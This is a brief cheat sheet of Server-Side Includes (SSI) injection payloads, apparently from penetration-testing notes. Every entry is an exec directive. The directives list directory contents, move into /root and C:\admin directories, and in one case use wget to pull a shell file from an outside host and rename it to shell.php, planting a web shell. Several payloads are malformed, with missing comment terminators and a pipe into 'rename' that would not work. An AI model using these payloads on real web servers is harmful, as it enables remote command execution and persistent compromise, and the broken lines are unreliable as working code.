Link to this headingServer-Side Includes (SSI) Injection
common file extentions .shtml, .stm, .shtm
Link to this headingExample Payloads
#List files of directory:
<!--#exec cmd="ls" -->
#Access directories:
<!--#exec cmd="cd /root/dir/">
#Execution script:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
#List files of directory:
<!--#exec cmd="dir" -->
#Access directories:
<!--#exec cmd="cd C:\admin\dir">